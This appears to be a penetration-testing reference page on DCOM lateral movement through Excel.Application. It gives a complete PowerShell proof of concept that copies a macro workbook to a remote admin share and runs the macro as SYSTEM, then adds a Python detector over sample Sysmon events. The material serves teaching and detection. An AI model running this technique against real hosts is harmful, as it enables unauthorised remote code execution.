Consider the DCOM object `Excel.Application`:

```powershell
$com = [activator]::CreateInstance([type]::GetTypeFromProgId("Excel.Application", "192.168.1.110")) # remote IP
$com | Get-Member # enumerate all methods and sub-objects
```
`Get-Member` would reveal that `Excel.Application` has a `Run` method, which can be used to run macros from an Excel document remotely. We can use the PoC macro below and add it to an Excel spreadsheet (see Examples for malicious payloads):

```vba
Sub mymacro()
    Shell ("notepad.exe")
End Sub
```
Upload the file to the target machine:

```powershell
$LocalPath = "C:\Users\jeff_admin.corp\myexcel.xls"
$RemotePath = "\\192.168.1.110\c$\myexcel.xls"
[System.IO.File]::Copy($LocalPath, $RemotePath, $True)
```
`Excel.Application` will run with SYSTEM permissions through DCOM. Opening a document, and thereby starting a process, requires a user profile, which SYSTEM doesn't have by default. Creating a Desktop folder for it resolves the issue:

```powershell
$Path = "\\192.168.1.110\c$\Windows\sysWOW64\config\systemprofile\Desktop"
$temp = [system.io.directory]::createDirectory($Path)
```
Use `Excel.Application.Workbooks.Open` to open the uploaded .xls file and run the macro:

```powershell
$Workbook = $com.Workbooks.Open("C:\myexcel.xls")
$com.Run("mymacro")
```
Here's a complete PoC compiled from the previous snippets:

```powershell
# Instantiate Excel.Application on the remote host via DCOM
$com = [activator]::CreateInstance([type]::GetTypeFromProgId("Excel.Application", "192.168.1.110"))
# Copy the macro-enabled workbook to the target's C$ share
$LocalPath = "C:\Users\jeff_admin.corp\myexcel.xlsm"
$RemotePath = "\\192.168.1.110\c$\myexcel.xlsm"
[System.IO.File]::Copy($LocalPath, $RemotePath, $True)
# Give the SYSTEM profile a Desktop folder so Excel can open documents
$Path = "\\192.168.1.110\c$\Windows\sysWOW64\config\systemprofile\Desktop"
$temp = [system.io.directory]::createDirectory($Path)
# Open the workbook and run the macro
$Workbook = $com.Workbooks.Open("C:\myexcel.xlsm")
$com.Run("mymacro")
```
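The detection-side counterpart to the PoC above, added here as an example (not part of the original page): over Sysmon-style process-create and file-create records (constructed sample data; field names follow Sysmon, the paths and PIDs are assumptions), it flags Excel started by the DcomLaunch service host with the `/automation -Embedding` flags, any process that Excel then spawns, and creation of the `systemprofile\Desktop` folder the PoC depends on.

```python
import re

# Sysmon-style records (EID 1 = process create, EID 11 = file create).
# Constructed sample data for this example, not real telemetry.
SAMPLE_EVENTS = [
    {"EventID": 1, "ProcessId": 4120, "User": r"NT AUTHORITY\SYSTEM",
     "Image": r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE",
     "CommandLine": r'"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE" /automation -Embedding',
     "ParentProcessId": 904, "ParentImage": r"C:\Windows\System32\svchost.exe",
     "ParentCommandLine": r"C:\Windows\system32\svchost.exe -k DcomLaunch -p"},
    # Folder written over the admin share: Sysmon attributes it to the System process.
    {"EventID": 11, "ProcessId": 4, "Image": "System",
     "TargetFilename": r"C:\Windows\SysWOW64\config\systemprofile\Desktop"},
    {"EventID": 1, "ProcessId": 4388, "User": r"NT AUTHORITY\SYSTEM",
     "Image": r"C:\Windows\System32\notepad.exe", "CommandLine": "notepad.exe",
     "ParentProcessId": 4120,
     "ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE",
     "ParentCommandLine": r'"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE" /automation -Embedding'},
    # Benign: an interactive user opening a workbook from Explorer.
    {"EventID": 1, "ProcessId": 5200, "User": r"CORP\alice",
     "Image": r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE",
     "CommandLine": r'"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE" "C:\Users\alice\report.xlsx"',
     "ParentProcessId": 3000, "ParentImage": r"C:\Windows\explorer.exe",
     "ParentCommandLine": r"C:\Windows\Explorer.EXE"},
]

# The Desktop folder the PoC creates so a profile-less SYSTEM Excel can open files.
SYSTEMPROFILE_DESKTOP = re.compile(r"\\config\\systemprofile\\Desktop$", re.IGNORECASE)


def is_dcom_launched_excel(ev):
    """Excel started by the DcomLaunch svchost with automation flags, i.e. via DCOM."""
    return (ev.get("EventID") == 1
            and ev["Image"].lower().endswith("\\excel.exe")
            and "-embedding" in ev["CommandLine"].lower()
            and ev["ParentImage"].lower().endswith("\\svchost.exe")
            and "dcomlaunch" in ev["ParentCommandLine"].lower())


def detect(events):
    """Walk events in time order; return (rule, pid, detail) alerts."""
    alerts, dcom_excel_pids = [], set()
    for ev in events:
        if is_dcom_launched_excel(ev):
            dcom_excel_pids.add(ev["ProcessId"])
            alerts.append(("dcom_excel_activation", ev["ProcessId"], ev["User"]))
        # Any child of a DCOM-activated Excel (e.g. a macro's Shell call) is high signal.
        elif ev.get("EventID") == 1 and ev["ParentProcessId"] in dcom_excel_pids:
            alerts.append(("child_of_dcom_excel", ev["ProcessId"], ev["Image"]))
        elif ev.get("EventID") == 11 and SYSTEMPROFILE_DESKTOP.search(ev["TargetFilename"]):
            alerts.append(("systemprofile_desktop_created", ev["ProcessId"], ev["TargetFilename"]))
    return alerts
```

The child-process rule depends on seeing the parent's create event first, so feed events in chronological order; on real telemetry, also pair the activation with the network logon (4624, type 3) from the calling host.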